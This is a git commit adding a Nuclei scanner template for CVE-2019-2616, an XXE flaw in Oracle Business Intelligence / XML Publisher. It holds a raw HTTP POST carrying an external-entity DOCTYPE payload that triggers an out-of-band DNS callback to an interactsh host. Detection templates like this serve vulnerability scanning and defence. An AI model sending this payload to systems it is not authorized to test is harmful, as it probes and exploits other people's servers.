Merge pull request #1664 from projectdiscovery/CVE-2019-2616

Added CVE-2019-2616
2021-06-09 23:58:05 +05:30 · 2021-06-09 23:58:05 +05:30 · 7ad653f5ae
parent 1f6d9147b4 ea26842383
commit 7ad653f5ae
1 changed files with 28 additions and 0 deletions
--- a/cves/2019/CVE-2019-2616.yaml
+++ b/cves/2019/CVE-2019-2616.yaml
@ -0,0 +1,28 @@
+id: CVE-2019-2616
+
+info:
+  name: XXE in Oracle Business Intelligence and XML Publisher
+  author: pdteam
+  severity: high
+  description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
+  reference: |
+      - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
+      - https://www.exploit-db.com/exploits/46729
+  tags: cve,cve2019,oracle,xxe,oob
+
+requests:
+  - raw:
+      - |
+        POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Content-Length: 76
+        Content-Type: text/xml; charset=UTF-8
+
+        <!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://{{interactsh-url}}">
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"